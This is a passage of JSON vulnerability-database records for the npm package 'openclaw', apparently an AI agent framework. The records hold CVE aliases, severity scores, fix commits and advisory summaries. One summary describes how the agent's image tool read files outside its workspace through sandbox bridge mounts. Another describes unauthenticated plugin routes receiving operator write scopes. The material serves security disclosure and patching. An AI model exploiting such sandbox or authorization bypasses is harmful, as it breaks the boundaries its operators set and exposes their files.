nerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-32004","GHSA-v865-p3gq-hw6m"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-49b4-qwz6-q7he"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91369?format=json","vulnerability_id":"VCID-4hcw-cv74-zkah","summary":"OpenClaw: Image Tool `tools.fs.workspaceOnly` Bypass via Sandbox Bridge Mounts\n## Summary\nThe `image` tool did not fully honor the `tools.fs.workspaceOnly` filesystem boundary. In affected releases, image-path resolution could still traverse sandbox bridge mounts outside the workspace and read files from mounted directories that the other file tools would reject.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.2`\n- Fixed: `>= 2026.3.2`\n- Latest released tags checked: `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`) and `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `dd9d9c1c609dcb4579f9e57bd7b5c879d0146b53`\n- `14baadda2c456f3cf749f1f97e8678746a34a7f4`\n\n## Release Status\nThe complete fix shipped in `v2026.3.2` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- `src/agents/openclaw-tools.ts` now passes `fsPolicy` into `createImageTool`, so the image tool receives the same workspace-only policy input as the other filesystem tools.\n- `src/agents/tools/image-tool.ts`, `src/agents/tools/media-tool-shared.ts`, and `src/agents/sandbox-media-paths.ts` now restrict local roots and sandbox-bridge resolution to the workspace when `tools.fs.workspaceOnly` is enabled.\n\nOpenClaw thanks @YLChen-007 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35658","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13506","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13472","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13512","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35658"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/14baadda2c456f3cf749f1f97e8678746a34a7f4","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/14baadda2c456f3cf749f1f97e8678746a34a7f4"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2"},{"reference_url":"https://github.com/openclaw/openclaw/commit/dd9d9c1c609dcb4579f9e57bd7b5c879d0146b53","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/dd9d9c1c609dcb4579f9e57bd7b5c879d0146b53"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfp9-w5v9-3q4h","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfp9-w5v9-3q4h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35658","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35658"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-filesystem-boundary-bypass-in-image-tool","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-filesystem-boundary-bypass-in-image-tool"},{"reference_url":"https://github.com/advisories/GHSA-cfp9-w5v9-3q4h","reference_id":"GHSA-cfp9-w5v9-3q4h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cfp9-w5v9-3q4h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-35658","GHSA-cfp9-w5v9-3q4h"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4hcw-cv74-zkah"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89638?format=json","vulnerability_id":"VCID-4hz5-f2pw-3yb4","summary":"OpenClaw: Unauthenticated plugin-auth HTTP routes receive operator runtime scopes\n## Summary\nUnauthenticated plugin-auth HTTP routes receive operator runtime scopes\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still gives auth:\"plugin\" routes operator WRITE_SCOPE, but impact should stay limited to plugin routes that actually touch privileged runtime actions before plugin auth completes.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2a1db0c0f1fa375004a95ba0ef030534790a6d47` — 2026-04-01T00:20:49+09:00\n\nOpenClaw thanks @davidluzsilva for 